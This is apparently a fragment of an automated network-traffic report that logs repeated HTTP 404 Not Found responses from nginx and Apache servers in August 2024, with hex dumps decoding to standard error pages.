Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 06 Aug 2024 05:56:50 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a62378-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 06 Aug 2024 05:56:52 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a62378-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 06 Aug 2024 05:56:55 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a62378-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 06 Aug 2024 05:58:47 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 06 Aug 2024 05:58:50 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 06 Aug 2024 05:58:52 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 06 Aug 2024 05:58:55 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Tue, 06 Aug 2024 05:59:24 GMTserver: Apachecontent-length: 315content-type: text/html; charset=iso-8859-1connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Tue, 06 Aug 2024 05:59:26 GMTserver: Apachecontent-length: 315content-type: text/html; charset=iso-8859-1connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Tue, 06 Aug 2024 05:59:29 GMTserver: Apachecontent-length: 315content-type: text/html; charset=iso-8859-1connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Tue, 06 Aug 2024 05:59:31 GMTserver: Apachecontent-length: 315content-type: text/html; charset=iso-8859-1connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
